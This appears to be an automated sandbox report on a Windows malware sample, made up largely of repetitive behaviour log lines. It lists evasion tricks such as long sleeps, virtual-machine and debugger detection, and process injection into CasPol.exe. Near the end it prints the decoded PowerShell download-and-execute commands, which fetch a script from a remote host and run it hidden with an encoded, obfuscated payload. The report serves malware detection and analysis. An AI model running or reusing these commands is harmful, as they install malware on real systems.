Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality to enumerate running services
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 16_2_0041A941
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2262 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1118 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4641 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5187 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4381 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5466 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 2590 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 6860 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: foregroundWindowGot 1759 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8700 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840 Thread sleep count: 4641 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8840 Thread sleep count: 5187 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8884 Thread sleep time: -13835058055282155s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8900 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep time: -23058430092136925s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2072 Thread sleep count: 255 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2072 Thread sleep time: -127500s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1312 Thread sleep count: 2590 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1312 Thread sleep time: -7770000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1312 Thread sleep count: 6860 > 30 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 1312 Thread sleep time: -20580000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose, 16_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 16_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose, 16_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 16_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0044E989 FindFirstFileExA, 16_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8, 16_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW, 16_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8, 16_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00406F13 FindFirstFileW,FindNextFileW, 16_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 16_2_00407357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !vmware virtual s scsi disk device
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware svga
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxservice
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: name!vmware virtual s scsi disk device
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware pointing device
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware sata
Source: powershell.exe, 00000008.00000002.2144293454.00000269476B0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.2074017523.000002693FFEE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VirtualMachineDetector
Source: powershell.exe, 00000003.00000002.1449525621.000001D722789000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: CasPol.exe, 00000010.00000002.2671512616.000000000127C000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000010.00000002.2669984293.000000000121B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmsrvc
Source: powershell.exe, 00000008.00000002.2141908622.0000026947369000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: powershell.exe, 00000008.00000002.2000087159.000002692F40E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V
Source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
Source: powershell.exe, 00000003.00000002.1450825885.000001D7229DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware vmci bus device
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware sata{0} ({1})
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareU{{ A = {0}, B = {1}, C = {2}, D = {3}, E = {4}, F = {5}, G = {6}, H = {7}, I = {8} }}
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware usb pointing device
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware s
Source: powershell.exe, 00000008.00000002.2000087159.000002692F40E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930B6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwarexD?$
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmtools
Source: CasPol.exe, 00000010.00000002.2671512616.000000000127C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWI
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: powershell.exe, 00000008.00000002.2000087159.0000026930B80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMwarexD?$
Source: powershell.exe, 00000008.00000002.2158169077.00007FF7C6724000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virtualmachinedetector
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0043B88D
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0041D0CF LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 16_2_0041D0CF
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004438F4 mov eax, dword ptr fs:[00000030h] 16_2_004438F4
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00411999 GetNativeSystemInfo,GetProcessHeap,HeapAlloc,SetLastError,SetLastError, 16_2_00411999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00435398 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 16_2_00435398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_0043B88D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_0043B88D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00434D6E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 16_2_00434D6E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_00434F01 SetUnhandledExceptionFilter, 16_2_00434F01

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell decode and execute
Source: Yara match File source: amsi64_5276.amsi.csv, type: OTHER
Yara detected Powershell download and execute
Source: Yara match File source: amsi64_5276.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5276, type: MEMORYSTR
Encrypted powershell cmdline option found
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded iNvOkE-ReStmethod -urI ( http://dea.remwavesw.com/h + app/MyFile02. + j + s ) -OutfilE $ENv:appdATa\GthhFfutuyhw.js ; STArT $ENV:aPPDAta\GthhFfutuyhw.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded iNvOkE-ReStmethod -urI ( http://dea.remwavesw.com/h + app/MyFile02. + j + s ) -OutfilE $ENv:appdATa\GthhFfutuyhw.js ; STArT $ENV:aPPDAta\GthhFfutuyhw.js
Source: C:\Windows\System32\wscript.exe Process created: Base64 decoded iNvOkE-ReStmethod -urI ( http://dea.remwavesw.com/h + app/MyFile02. + j + s ) -OutfilE $ENv:appdATa\GthhFfutuyhw.js ; STArT $ENV:aPPDAta\GthhFfutuyhw.js Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded iNvOkE-ReStmethod -urI ( http://dea.remwavesw.com/h + app/MyFile02. + j + s ) -OutfilE $ENv:appdATa\GthhFfutuyhw.js ; STArT $ENV:aPPDAta\GthhFfutuyhw.js Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 459000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 472000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 478000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47D000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: F34008 Jump to behavior
Contains functionality to simulate mouse events
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 16_2_004197D9 mouse_event, 16_2_004197D9
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sySteM32\wINDowSpOWersHELL\v1.0\POwersHeLL.eXe" "PoWeRShELL -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== " Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAsS -NoP -w hiDdEn -ec IAAJAGkATgB2AE8AawBFAC0AUgBlAFMAdABtAGUAdABoAG8AZAAgACAALQB1AHIASQAgACAAKAAdIGgAdAB0AHAAOgAvAC8AZABlAGEALgByAGUAbQB3AGEAdgBlAHMAdwAuAGMAbwBtAC8AaAAdICAACQAgAAkAKwAgAAkAHSBhAHAAcAAvAE0AeQBGAGkAbABlADAAMgAuAB0gIAAJACAACQArACAACQAdIGoAHSAgAAkAIAAJACsAIAAJAB0gcwAdICAACQApACAALQBPAHUAdABmAGkAbABFACAACQAdICQARQBOAHYAOgBhAHAAcABkAEEAVABhAFwARwB0AGgAaABGAGYAdQB0AHUAeQBoAHcALgBqAHMAHSAgADsAIAAJAFMAVABBAHIAVAAgAB0gJABFAE4AVgA6AGEAUABQAEQAQQB0AGEAXABHAHQAaABoAEYAZgB1AHQAdQB5AGgAdwAuAGoAcwAdIA== Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\GthhFfutuyhw.js" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaPQNyssagNyssaCcNyssaIwB4NyssaCMNyssaLgBlNyssaCMNyssaYQBtNyssaC8NyssaZNyssaBuNyssaGkNyssaawNyssavNyssaG0NyssabwBjNyssaC4NyssadwBzNyssaGUNyssadgBhNyssaHcNyssabQBlNyssaHINyssaLgBhNyssaGUNyssaZNyssaNyssavNyssaC8NyssaOgBwNyssaCMNyssaIwBoNyssaCcNyssaOwNyssakNyssaGINyssadQBtNyssaHNyssaNyssaZQByNyssaHMNyssaINyssaNyssa9NyssaCNyssaNyssaJNyssaBlNyssaHMNyssaYwBhNyssaHNyssaNyssabwBsNyssaG8NyssaZwBpNyssaHMNyssadNyssaBzNyssaCNyssaNyssaLQByNyssaGUNyssacNyssaBsNyssaGENyssaYwBlNyssaCNyssaNyssaJwNyssajNyssaCcNyssaLNyssaNyssagNyssaCcNyssadNyssaNyssanNyssaDsNyssaJNyssaBtNyssaGUNyssadNyssaBhNyssaGwNyssabNyssaBhNyssaGMNyssaeQBjNyssaGwNyssaZQNyssagNyssaD0NyssaINyssaNyssanNyssaGgNyssadNyssaB0NyssaHNyssaNyssacwNyssa6NyssaC8NyssaLwBpNyssaGENyssaONyssaNyssawNyssaDNyssaNyssaNwNyssawNyssaDUNyssaLgB1NyssaHMNyssaLgBhNyssaHINyssaYwBoNyssaGkNyssadgBlNyssaC4NyssabwByNyssaGcNyssaLwNyssaxNyssaDQNyssaLwBpNyssaHQNyssaZQBtNyssaHMNyssaLwBuNyssaGUNyssadwBfNyssaGkNyssabQBhNyssaGcNyssaZQBfNyssaDINyssaMNyssaNyssayNyssaDUNyssaMNyssaNyssazNyssaDINyssaNNyssaNyssavNyssaG4NyssaZQB3NyssaF